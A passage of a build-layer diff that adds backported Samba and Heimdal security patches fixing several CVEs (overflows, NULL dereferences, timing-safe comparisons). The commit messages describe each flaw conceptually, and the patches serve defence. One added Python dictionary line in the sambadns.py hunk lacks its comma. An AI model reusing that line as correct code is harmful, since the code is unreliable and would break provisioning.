python/samba/provision/sambadns.py | 4 ++++ + 2 files changed, 9 insertions(+) + +diff --git a/python/samba/provision/__init__.py b/python/samba/provision/__init__.py +index e8903ad..0c52cc1 100644 +--- a/python/samba/provision/__init__.py ++++ b/python/samba/provision/__init__.py +@@ -79,6 +79,7 @@ from samba.provision.backend import ( + LDBBackend, + ) + from samba.descriptor import ( ++ get_deletedobjects_descriptor, + get_empty_descriptor, + get_config_descriptor, + get_config_partitions_descriptor, +@@ -1441,6 +1442,8 @@ def fill_samdb(samdb, lp, names, logger, policyguid, + msg["subRefs"] = ldb.MessageElement(names.configdn, ldb.FLAG_MOD_ADD, + "subRefs") + ++ deletedobjects_descr = b64encode(get_deletedobjects_descriptor(names.domainsid)).decode('utf8') ++ + samdb.invocation_id = invocationid + + # If we are setting up a subdomain, then this has been replicated in, so we don't need to add it +@@ -1472,6 +1475,7 @@ def fill_samdb(samdb, lp, names, logger, policyguid, + "FOREST_FUNCTIONALITY": str(forestFunctionality), + "DOMAIN_FUNCTIONALITY": str(domainFunctionality), + "NTDSQUOTAS_DESCRIPTOR": ntdsquotas_descr, ++ "DELETEDOBJECTS_DESCRIPTOR": deletedobjects_descr, + "LOSTANDFOUND_DESCRIPTOR": protected1wd_descr, + "SERVICES_DESCRIPTOR": protected1_descr, + "PHYSICALLOCATIONS_DESCRIPTOR": protected1wd_descr, +@@ -1536,6 +1540,7 @@ def fill_samdb(samdb, lp, names, logger, policyguid, + "RIDAVAILABLESTART": str(next_rid + 600), + "POLICYGUID_DC": policyguid_dc, + "INFRASTRUCTURE_DESCRIPTOR": infrastructure_desc, ++ "DELETEDOBJECTS_DESCRIPTOR": deletedobjects_descr, + "LOSTANDFOUND_DESCRIPTOR": lostandfound_desc, + "SYSTEM_DESCRIPTOR": system_desc, + "BUILTIN_DESCRIPTOR": builtin_desc, +diff --git a/python/samba/provision/sambadns.py b/python/samba/provision/sambadns.py +index 8a5d8a9..61beb16 100644 +--- a/python/samba/provision/sambadns.py ++++ b/python/samba/provision/sambadns.py +@@ -41,6 +41,7 @@ from samba.dsdb import ( + DS_DOMAIN_FUNCTION_2016 + ) + from samba.descriptor import ( ++ get_deletedobjects_descriptor, + get_domain_descriptor, + get_domain_delete_protected1_descriptor, + get_domain_delete_protected2_descriptor, +@@ -245,6 +246,7 @@ def setup_dns_partitions(samdb, domainsid, domaindn, forestdn, configdn, + domainzone_dn = "DC=DomainDnsZones,%s" % domaindn + forestzone_dn = "DC=ForestDnsZones,%s" % forestdn + descriptor = get_dns_partition_descriptor(domainsid) ++ deletedobjects_desc = get_deletedobjects_descriptor(domainsid) + + setup_add_ldif(samdb, setup_path("provision_dnszones_partitions.ldif"), { + "ZONE_DN": domainzone_dn, +@@ -268,6 +270,7 @@ def setup_dns_partitions(samdb, domainsid, domaindn, forestdn, configdn, + "ZONE_DNS": domainzone_dns, + "CONFIGDN": configdn, + "SERVERDN": serverdn, ++ "DELETEDOBJECTS_DESCRIPTOR": b64encode(deletedobjects_desc).decode('utf8'), + "LOSTANDFOUND_DESCRIPTOR": b64encode(protected2_desc).decode('utf8'), + "INFRASTRUCTURE_DESCRIPTOR": b64encode(protected1_desc).decode('utf8'), + }) +@@ -288,6 +291,7 @@ def setup_dns_partitions(samdb, domainsid, domaindn, forestdn, configdn, + "ZONE_DNS": forestzone_dns, + "CONFIGDN": configdn, + "SERVERDN": serverdn, ++ "DELETEDOBJECTS_DESCRIPTOR": b64encode(deletedobjects_desc).decode('utf8') + "LOSTANDFOUND_DESCRIPTOR": b64encode(protected2_desc).decode('utf8'), + "INFRASTRUCTURE_DESCRIPTOR": b64encode(protected1_desc).decode('utf8'), + }) +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0006.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0006.patch new file mode 100644 index 0000000000..d92ad41df1 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2018-14628-0006.patch @@ -0,0 +1,51 @@ +From e884fc791e59bd6ebd41b4a2ab7c9d7dc45415f4 Mon Sep 17 00:00:00 2001 +From: Stefan Metzmacher <metze@samba.org> +Date: Fri, 29 Jan 2016 23:30:59 +0100 +Subject: [PATCH] CVE-2018-14628: python:descriptor: add + get_deletedobjects_descriptor() + +samba-tool drs clone-dc-database was quite useful to find +the true value of nTSecurityDescriptor of the CN=Delete Objects +containers. + +Only the auto inherited SACL is available via a ldap search. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=13595 + +Signed-off-by: Stefan Metzmacher <metze@samba.org> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> +(cherry picked from commit 3be190dcf7153e479383f7f3d29ddca43fe121b8) + +CVE: CVE-2018-14628 + +Upstream-Status: Backport +[https://github.com/samba-team/samba/commit/e884fc791e59bd6ebd41b4a2ab7c9d7dc45415f4] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + python/samba/descriptor.py | 10 ++++++++++ + 1 file changed, 10 insertions(+) + +diff --git a/python/samba/descriptor.py b/python/samba/descriptor.py +index 08cfab0..0141f38 100644 +--- a/python/samba/descriptor.py ++++ b/python/samba/descriptor.py +@@ -52,6 +52,16 @@ def get_empty_descriptor(domain_sid, name_map={}): + # "get_schema_descriptor" is located in "schema.py" + + ++def get_deletedobjects_descriptor(domain_sid, name_map=None): ++ if name_map is None: ++ name_map = {} ++ ++ sddl = "O:SYG:SYD:PAI" \ ++ "(A;;RPWPCCDCLCRCWOWDSDSW;;;SY)" \ ++ "(A;;RPLC;;;BA)" ++ return sddl2binary(sddl, domain_sid, name_map) ++ ++ + def get_config_descriptor(domain_sid, name_map={}): + sddl = "O:EAG:EAD:(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)" \ + "(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)" \ +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2021-44758.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2021-44758.patch new file mode 100644 index 0000000000..6610899458 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2021-44758.patch @@ -0,0 +1,72 @@ +From f9ec7002cdd526ae84fbacbf153162e118f22580 Mon Sep 17 00:00:00 2001 +From: Nicolas Williams <nico@twosigma.com> +Date: Wed Mar 9 10:18:52 2022 -0600 +Subject: [PATCH] spnego: CVE-2021-44758 send_reject when no mech selected + + This fixes a DoS where an initial SPNEGO token that has no acceptable + mechanisms causes a NULL dereference in acceptors. + + send_accept() when called with a non-zero 'initial_response' did + not handle the case of gssspnego_ctx.preferred_mech_type equal + to GSS_C_NO_OID. + + The failure to handle GSS_C_NO_OID has been present since the + initial revision of gssapi/spnego, + 2baa7e7d613c26b2b037b368931519a84baec53d but might not have + been exercised until later revisions. + + The introduction of opportunistic token handling in + gss_accept_sec_context(), 3c9d3266f47f594a29068c9d629908e7000ac663, + introduced two bugs: + + 1. The optional mechToken field is used unconditionally + possibly resulting in a segmentation fault. + + 2. If use of the opportunistic token is unsuccessful and the + mech type list length is one, send_accept() can be called + with 'initial_response' true and preferred mech set to + GSS_C_NO_OID. + + b53c90da0890a9cce6f95c552f094ff6d69027bf ("Make error reporting + somewhat more correct for SPNEGO") attempted to fix the first + issue and increased the likelihood of the second. + + This change alters the behavior of acceptor_start() so it calls + send_reject() when no mechanism was selected. + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/f9ec7002cdd526ae84fbacbf153162e118f22580] +CVE: CVE-2021-44758 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + .../heimdal/lib/gssapi/spnego/accept_sec_context.c | 14 ++++++++------ + 1 file changed, 8 insertions(+), 6 deletions(-) + +diff --git a/lib/gssapi/spnego/accept_sec_context.c b/lib/gssapi/spnego/accept_sec_context.c +index 3a51dd3..b60dc19 100644 +--- a/lib/gssapi/spnego/accept_sec_context.c ++++ b/lib/gssapi/spnego/accept_sec_context.c +@@ -619,13 +619,15 @@ acceptor_start + if (ret == 0) + break; + } +- if (preferred_mech_type == GSS_C_NO_OID) { +- HEIMDAL_MUTEX_unlock(&ctx->ctx_id_mutex); +- free_NegotiationToken(&nt); +- return ret; +- } ++ } ++ ++ ctx->preferred_mech_type = preferred_mech_type; + +- ctx->preferred_mech_type = preferred_mech_type; ++ if (preferred_mech_type == GSS_C_NO_OID) { ++ send_reject(minor_status, output_token); ++ HEIMDAL_MUTEX_unlock(&ctx->ctx_id_mutex); ++ free_NegotiationToken(&nt); ++ return ret; + } + + /* +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-2127.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-2127.patch new file mode 100644 index 0000000000..e94d5d538b --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-2127.patch @@ -0,0 +1,44 @@ +From 53838682570135b753fa622dfcde111528563c2d Mon Sep 17 00:00:00 2001 +From: Ralph Boehme <slow@samba.org> +Date: Fri, 16 Jun 2023 12:28:47 +0200 +Subject: [PATCH] CVE-2022-2127: ntlm_auth: cap lanman response length value + +We already copy at most sizeof(request.data.auth_crap.lm_resp) bytes to the +lm_resp buffer, but we don't cap the length indicator. + +BUG: https://bugzilla.samba.org/show_bug.cgi?id=15072 + +Signed-off-by: Ralph Boehme <slow@samba.org> + +CVE: CVE-2022-2127 + +Upstream-Status: Backport [https://github.com/samba-team/samba/commit/53838682570135b753fa622dfcde111528563c2d] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + source3/utils/ntlm_auth.c | 8 ++++++-- + 1 file changed, 6 insertions(+), 2 deletions(-) + +diff --git a/source3/utils/ntlm_auth.c b/source3/utils/ntlm_auth.c +index 02a2379..c82ea45 100644 +--- a/source3/utils/ntlm_auth.c ++++ b/source3/utils/ntlm_auth.c +@@ -574,10 +574,14 @@ NTSTATUS contact_winbind_auth_crap(const char *username, + memcpy(request.data.auth_crap.chal, challenge->data, MIN(challenge->length, 8)); + + if (lm_response && lm_response->length) { ++ size_t capped_lm_response_len = MIN( ++ lm_response->length, ++ sizeof(request.data.auth_crap.lm_resp)); ++ + memcpy(request.data.auth_crap.lm_resp, + lm_response->data, +- MIN(lm_response->length, sizeof(request.data.auth_crap.lm_resp))); +- request.data.auth_crap.lm_resp_len = lm_response->length; ++ capped_lm_response_len); ++ request.data.auth_crap.lm_resp_len = capped_lm_response_len; + } + + if (nt_response && nt_response->length) { +-- +2.40.0 diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0001.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0001.patch new file mode 100644 index 0000000000..abc778b731 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0001.patch @@ -0,0 +1,77 @@ +From f6edaafcfefd843ca1b1a041f942a853d85ee7c3 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Wed, 12 Oct 2022 13:57:13 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Use constant-time memcmp() for arcfour + unwrap + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/f6edaafcfefd843ca1b1a041f942a853d85ee7c3] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/arcfour.c | 16 ++++++++-------- + 1 file changed, 8 insertions(+), 8 deletions(-) + +diff --git a/lib/gssapi/krb5/arcfour.c b/lib/gssapi/krb5/arcfour.c +index a61f768..4fc46ce 100644 +--- a/lib/gssapi/krb5/arcfour.c ++++ b/lib/gssapi/krb5/arcfour.c +@@ -365,7 +365,7 @@ _gssapi_verify_mic_arcfour(OM_uint32 * minor_status, + return GSS_S_FAILURE; + } + +- cmp = ct_memcmp(cksum_data, p + 8, 8); ++ cmp = (ct_memcmp(cksum_data, p + 8, 8) == 0); + if (cmp) { + *minor_status = 0; + return GSS_S_BAD_MIC; +@@ -385,9 +385,9 @@ _gssapi_verify_mic_arcfour(OM_uint32 * minor_status, + _gsskrb5_decode_be_om_uint32(SND_SEQ, &seq_number); + + if (context_handle->more_flags & LOCAL) +- cmp = memcmp(&SND_SEQ[4], "\xff\xff\xff\xff", 4); ++ cmp = (ct_memcmp(&SND_SEQ[4], "\xff\xff\xff\xff", 4) != 0); + else +- cmp = memcmp(&SND_SEQ[4], "\x00\x00\x00\x00", 4); ++ cmp = (ct_memcmp(&SND_SEQ[4], "\x00\x00\x00\x00", 4) != 0); + + memset(SND_SEQ, 0, sizeof(SND_SEQ)); + if (cmp != 0) { +@@ -656,9 +656,9 @@ OM_uint32 _gssapi_unwrap_arcfour(OM_uint32 *minor_status, + _gsskrb5_decode_be_om_uint32(SND_SEQ, &seq_number); + + if (context_handle->more_flags & LOCAL) +- cmp = memcmp(&SND_SEQ[4], "\xff\xff\xff\xff", 4); ++ cmp = (ct_memcmp(&SND_SEQ[4], "\xff\xff\xff\xff", 4) != 0); + else +- cmp = memcmp(&SND_SEQ[4], "\x00\x00\x00\x00", 4); ++ cmp = (ct_memcmp(&SND_SEQ[4], "\x00\x00\x00\x00", 4) != 0); + + if (cmp != 0) { + *minor_status = 0; +@@ -730,7 +730,7 @@ OM_uint32 _gssapi_unwrap_arcfour(OM_uint32 *minor_status, + return GSS_S_FAILURE; + } + +- cmp = ct_memcmp(cksum_data, p0 + 16, 8); /* SGN_CKSUM */ ++ cmp = (ct_memcmp(cksum_data, p0 + 16, 8) == 0); /* SGN_CKSUM */ + if (cmp) { + _gsskrb5_release_buffer(minor_status, output_message_buffer); + *minor_status = 0; +@@ -1266,9 +1266,9 @@ _gssapi_unwrap_iov_arcfour(OM_uint32 *minor_status, + _gsskrb5_decode_be_om_uint32(snd_seq, &seq_number); + + if (ctx->more_flags & LOCAL) { +- cmp = memcmp(&snd_seq[4], "\xff\xff\xff\xff", 4); ++ cmp = (ct_memcmp(&snd_seq[4], "\xff\xff\xff\xff", 4) != 0); + } else { +- cmp = memcmp(&snd_seq[4], "\x00\x00\x00\x00", 4); ++ cmp = (ct_memcmp(&snd_seq[4], "\x00\x00\x00\x00", 4) != 0); + } + if (cmp != 0) { + *minor_status = 0; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0002.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0002.patch new file mode 100644 index 0000000000..5686df78e1 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0002.patch @@ -0,0 +1,35 @@ +From c9cc34334bd64b08fe91a2f720262462e9f6bb49 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Wed, 12 Oct 2022 13:57:55 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Use constant-time memcmp() in + unwrap_des3() + +The surrounding checks all use ct_memcmp(), so this one was presumably +meant to as well. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/c9cc34334bd64b08fe91a2f720262462e9f6bb49] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/unwrap.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/lib/gssapi/krb5/unwrap.c b/lib/gssapi/krb5/unwrap.c +index da939c0529..61a341ee43 100644 +--- a/lib/gssapi/krb5/unwrap.c ++++ b/lib/gssapi/krb5/unwrap.c +@@ -227,7 +227,7 @@ unwrap_des3 + if (ret) + return ret; + +- if (memcmp (p, "\x04\x00", 2) != 0) /* HMAC SHA1 DES3_KD */ ++ if (ct_memcmp (p, "\x04\x00", 2) != 0) /* HMAC SHA1 DES3_KD */ + return GSS_S_BAD_SIG; + p += 2; + if (ct_memcmp (p, "\x02\x00", 2) == 0) { diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0003.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0003.patch new file mode 100644 index 0000000000..55239356e4 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0003.patch @@ -0,0 +1,50 @@ +From a587a4bcb28d5b9047f332573b1e7c8f89ca3edd Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Wed, 12 Oct 2022 13:57:42 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Don't pass NULL pointers to memcpy() + in DES unwrap + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/a587a4bcb28d5b9047f332573b1e7c8f89ca3edd] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/unwrap.c | 14 ++++++++------ + 1 file changed, 8 insertions(+), 6 deletions(-) + +diff --git a/lib/gssapi/krb5/unwrap.c b/lib/gssapi/krb5/unwrap.c +index 61a341ee43..d3987240dd 100644 +--- a/lib/gssapi/krb5/unwrap.c ++++ b/lib/gssapi/krb5/unwrap.c +@@ -180,9 +180,10 @@ unwrap_des + output_message_buffer->value = malloc(output_message_buffer->length); + if(output_message_buffer->length != 0 && output_message_buffer->value == NULL) + return GSS_S_FAILURE; +- memcpy (output_message_buffer->value, +- p + 24, +- output_message_buffer->length); ++ if (output_message_buffer->value != NULL) ++ memcpy (output_message_buffer->value, ++ p + 24, ++ output_message_buffer->length); + return GSS_S_COMPLETE; + } + #endif +@@ -374,9 +375,10 @@ unwrap_des3 + output_message_buffer->value = malloc(output_message_buffer->length); + if(output_message_buffer->length != 0 && output_message_buffer->value == NULL) + return GSS_S_FAILURE; +- memcpy (output_message_buffer->value, +- p + 36, +- output_message_buffer->length); ++ if (output_message_buffer->value != NULL) ++ memcpy (output_message_buffer->value, ++ p + 36, ++ output_message_buffer->length); + return GSS_S_COMPLETE; + } diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0004.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0004.patch new file mode 100644 index 0000000000..4e750f0dc6 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0004.patch @@ -0,0 +1,57 @@ +From c758910eaad3c0de2cfb68830a661c4739675a7d Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Mon, 15 Aug 2022 16:53:45 +1200 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Avoid undefined behaviour in + _gssapi_verify_pad() + +By decrementing 'pad' only when we know it's safe, we ensure we can't +stray backwards past the start of a buffer, which would be undefined +behaviour. + +In the previous version of the loop, 'i' is the number of bytes left to +check, and 'pad' is the current byte we're checking. 'pad' was +decremented at the end of each loop iteration. If 'i' was 1 (so we +checked the final byte), 'pad' could potentially be pointing to the +first byte of the input buffer, and the decrement would put it one +byte behind the buffer. + +That would be undefined behaviour. + +The patch changes it so that 'pad' is the byte we previously checked, +which allows us to ensure that we only decrement it when we know we +have a byte to check. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/c758910eaad3c0de2cfb68830a661c4739675a7d] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/decapsulate.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/lib/gssapi/krb5/decapsulate.c b/lib/gssapi/krb5/decapsulate.c +index 86085f5695..4e3fcd659e 100644 +--- a/lib/gssapi/krb5/decapsulate.c ++++ b/lib/gssapi/krb5/decapsulate.c +@@ -193,13 +193,13 @@ _gssapi_verify_pad(gss_buffer_t wrapped_token, + if (wrapped_token->length < 1) + return GSS_S_BAD_MECH; + +- pad = (u_char *)wrapped_token->value + wrapped_token->length - 1; +- padlength = *pad; ++ pad = (u_char *)wrapped_token->value + wrapped_token->length; ++ padlength = pad[-1]; + + if (padlength > datalen) + return GSS_S_BAD_MECH; + +- for (i = padlength; i > 0 && *pad == padlength; i--, pad--) ++ for (i = padlength; i > 0 && *--pad == padlength; i--) + ; + if (i != 0) + return GSS_S_BAD_MIC; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0005.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0005.patch new file mode 100644 index 0000000000..d6ea22e3df --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0005.patch @@ -0,0 +1,37 @@ +From 414b2a77fd61c26d64562e3800dc5578d9d0f15d Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Mon, 15 Aug 2022 16:53:55 +1200 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Check the result of + _gsskrb5_get_mech() + +We should make sure that the result of 'total_len - mech_len' won't +overflow, and that we don't memcmp() past the end of the buffer. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/414b2a77fd61c26d64562e3800dc5578d9d0f15d] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/decapsulate.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/lib/gssapi/krb5/decapsulate.c b/lib/gssapi/krb5/decapsulate.c +index 4e3fcd659e..031a621eab 100644 +--- a/lib/gssapi/krb5/decapsulate.c ++++ b/lib/gssapi/krb5/decapsulate.c +@@ -80,6 +80,10 @@ _gssapi_verify_mech_header(u_char **str, + + if (mech_len != mech->length) + return GSS_S_BAD_MECH; ++ if (mech_len > total_len) ++ return GSS_S_BAD_MECH; ++ if (p - *str > total_len - mech_len) ++ return GSS_S_BAD_MECH; + if (ct_memcmp(p, + mech->elements, + mech->length) != 0) diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0006.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0006.patch new file mode 100644 index 0000000000..9fa59c29b0 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0006.patch @@ -0,0 +1,65 @@ +From be9bbd93ed8f204b4bc1b92d1bc3c16aac194696 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Mon, 15 Aug 2022 16:54:23 +1200 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Check buffer length against overflow + for DES{,3} unwrap + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/be9bbd93ed8f204b4bc1b92d1bc3c16aac194696] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/unwrap.c | 14 ++++++++++++++ + 1 file changed, 14 insertions(+) + +diff --git a/lib/gssapi/krb5/unwrap.c b/lib/gssapi/krb5/unwrap.c +index d3987240dd..fddb64bc53 100644 +--- a/lib/gssapi/krb5/unwrap.c ++++ b/lib/gssapi/krb5/unwrap.c +@@ -64,6 +64,8 @@ unwrap_des + + if (IS_DCE_STYLE(context_handle)) { + token_len = 22 + 8 + 15; /* 45 */ ++ if (input_message_buffer->length < token_len) ++ return GSS_S_BAD_MECH; + } else { + token_len = input_message_buffer->length; + } +@@ -76,6 +78,11 @@ unwrap_des + if (ret) + return ret; + ++ len = (p - (u_char *)input_message_buffer->value) ++ + 22 + 8; ++ if (input_message_buffer->length < len) ++ return GSS_S_BAD_MECH; ++ + if (memcmp (p, "\x00\x00", 2) != 0) + return GSS_S_BAD_SIG; + p += 2; +@@ -216,6 +223,8 @@ unwrap_des3 + + if (IS_DCE_STYLE(context_handle)) { + token_len = 34 + 8 + 15; /* 57 */ ++ if (input_message_buffer->length < token_len) ++ return GSS_S_BAD_MECH; + } else { + token_len = input_message_buffer->length; + } +@@ -228,6 +237,11 @@ unwrap_des3 + if (ret) + return ret; + ++ len = (p - (u_char *)input_message_buffer->value) ++ + 34 + 8; ++ if (input_message_buffer->length < len) ++ return GSS_S_BAD_MECH; ++ + if (ct_memcmp (p, "\x04\x00", 2) != 0) /* HMAC SHA1 DES3_KD */ + return GSS_S_BAD_SIG; + p += 2; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0007.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0007.patch new file mode 100644 index 0000000000..b3197afc34 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0007.patch @@ -0,0 +1,39 @@ +From c8407ca079294d76a5ed140ba5b546f870d23ed2 Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Mon, 10 Oct 2022 20:33:09 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Check for overflow in + _gsskrb5_get_mech() + +If len_len is equal to total_len - 1 (i.e. the input consists only of a +0x60 byte and a length), the expression 'total_len - 1 - len_len - 1', +used as the 'len' parameter to der_get_length(), will overflow to +SIZE_MAX. Then der_get_length() will proceed to read, unconstrained, +whatever data follows in memory. Add a check to ensure that doesn't +happen. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/c8407ca079294d76a5ed140ba5b546f870d23ed2] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/decapsulate.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/lib/gssapi/krb5/decapsulate.c b/lib/gssapi/krb5/decapsulate.c +index 031a621eab..d7b75a6422 100644 +--- a/lib/gssapi/krb5/decapsulate.c ++++ b/lib/gssapi/krb5/decapsulate.c +@@ -54,6 +54,8 @@ _gsskrb5_get_mech (const u_char *ptr, + e = der_get_length (p, total_len - 1, &len, &len_len); + if (e || 1 + len_len + len != total_len) + return -1; ++ if (total_len < 1 + len_len + 1) ++ return -1; + p += len_len; + if (*p++ != 0x06) + return -1; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0008.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0008.patch new file mode 100644 index 0000000000..6d64312211 --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-3437-0008.patch @@ -0,0 +1,48 @@ +From 8fb508a25a6a47289c73e3f4339352a73a396eef Mon Sep 17 00:00:00 2001 +From: Joseph Sutton <josephsutton@catalyst.net.nz> +Date: Wed, 12 Oct 2022 13:57:33 +1300 +Subject: [PATCH] gsskrb5: CVE-2022-3437 Pass correct length to + _gssapi_verify_pad() + +We later subtract 8 when calculating the length of the output message +buffer. If padlength is excessively high, this calculation can underflow +and result in a very large positive value. + +Now we properly constrain the value of padlength so underflow shouldn't +be possible. + +Samba BUG: https://bugzilla.samba.org/show_bug.cgi?id=15134 + +Signed-off-by: Joseph Sutton <josephsutton@catalyst.net.nz> +Reviewed-by: Andrew Bartlett <abartlet@samba.org> + +Upstream-Status: Backport [https://github.com/heimdal/heimdal/commit/8fb508a25a6a47289c73e3f4339352a73a396eef] +CVE: CVE-2022-3437 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/gssapi/krb5/unwrap.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/lib/gssapi/krb5/unwrap.c b/lib/gssapi/krb5/unwrap.c +index fddb64bc53..bab30f4501 100644 +--- a/lib/gssapi/krb5/unwrap.c ++++ b/lib/gssapi/krb5/unwrap.c +@@ -124,7 +124,7 @@ unwrap_des + } else { + /* check pad */ + ret = _gssapi_verify_pad(input_message_buffer, +- input_message_buffer->length - len, ++ input_message_buffer->length - len - 8, + &padlength); + if (ret) + return ret; +@@ -289,7 +289,7 @@ unwrap_des3 + } else { + /* check pad */ + ret = _gssapi_verify_pad(input_message_buffer, +- input_message_buffer->length - len, ++ input_message_buffer->length - len - 8, + &padlength); + if (ret) + return ret; diff --git a/meta-networking/recipes-connectivity/samba/samba/CVE-2022-41916.patch b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-41916.patch new file mode 100644 index 0000000000..07f4a18a2f --- /dev/null +++ b/meta-networking/recipes-connectivity/samba/samba/CVE-2022-41916.patch @@ -0,0 +1,38 @@ +From eb87af0c2d189c25294c7daf483a47b03af80c2c Mon Sep 17 00:00:00 2001 +From: Jeffrey Altman <jaltman@secure-endpoints.com> +Date: Wed, 17 Nov 2021 20:00:29 -0500 +Subject: 